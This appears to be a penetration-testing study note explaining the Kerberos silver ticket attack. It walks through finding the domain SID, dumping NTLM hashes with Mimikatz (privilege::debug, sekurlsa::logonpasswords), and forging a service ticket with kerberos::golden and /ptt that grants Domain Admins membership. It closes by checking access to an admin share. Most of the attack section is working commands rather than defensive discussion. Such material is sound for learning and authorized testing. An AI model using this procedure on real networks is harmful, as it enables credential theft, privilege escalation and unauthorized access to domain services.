Silver Ticket Attack

  • Earlier we used the overpass the hash technique to acquire a Kerberos TGT, which lets us authenticate with Kerberos instead of NTLM. A TGT can only be used from the machine it was created on, but a TGS (service ticket) potentially offers more flexibility.

    The Pass the Ticket attack takes advantage of the TGS: a service ticket can be exported, re-injected elsewhere on the network, and then used to authenticate to the specific service it was issued for. If the service tickets belong to the current user, no administrative privileges are required to export them. On its own this gives no additional access; it only lets us choose which machine to use the ticket from. The scenario becomes more interesting when a service is registered with a service principal name (SPN). Previously (Kerberoasting) we requested a service ticket for such an SPN, cracked the service account's password hash offline and recovered the password, which could then be used to access resources available to the service account. However, if the service account is not a local administrator on any server, we cannot use it for lateral movement via pass the hash or overpass the hash, so in these cases we need a different approach: the silver ticket. Because a TGS is encrypted and signed with the service account's key, knowing that account's NTLM hash lets us forge a service ticket ourselves, putting any username and any group membership (for example Domain Admins) into its PAC. The service accepts the forged ticket because by default it validates only the signature made with its own key and does not contact the domain controller, so the forged ticket never passes through the KDC and no TGT is needed.

  1. Run whoami /user to get the current user's SID, for example S-1-5-21-1602875587-2787523311-2599479668-1103. The domain SID is the entire string except the RID at the end (-1103), i.e. S-1-5-21-1602875587-2787523311-2599479668.

  2. Extract the NTLM hash of the account the target service runs as (privilege::debug needs local administrator rights; sekurlsa::logonpasswords only returns hashes for accounts that have a logon session on this host, so run it where the service account is logged on; for services that run as the machine account, such as CIFS or HOST, the hash needed is the computer account's):

    1. Mimikatz.exe

    2. privilege::debug

    3. sekurlsa::logonpasswords

  3. kerberos::purge to delete the existing tickets in the current logon session

  4. kerberos::list to verify the session is now empty

  5. kerberos::golden /user:<user> /domain:<domain> /sid:<domain SID from step 1> /target:<fully qualified host name of the server running the service> /service:<SPN service class, e.g. cifs, http, mssqlsvc> /rc4:<NTLM hash of the service account> /ptt (the /ptt flag injects the forged TGS straight into the current session; <user> need not be the real owner of the hash, it is simply the identity the service will see, and mimikatz adds privileged groups such as Domain Admins to the ticket by default)

  6. misc::cmd to launch a cmd that inherits the injected ticket, then verify success with klist and by accessing the service (for cifs, e.g. dir \\<target>\c$)

Reference:

Silver ticket attack: https://www.netwrix.com/silver_ticket_attack_forged_service_tickets.html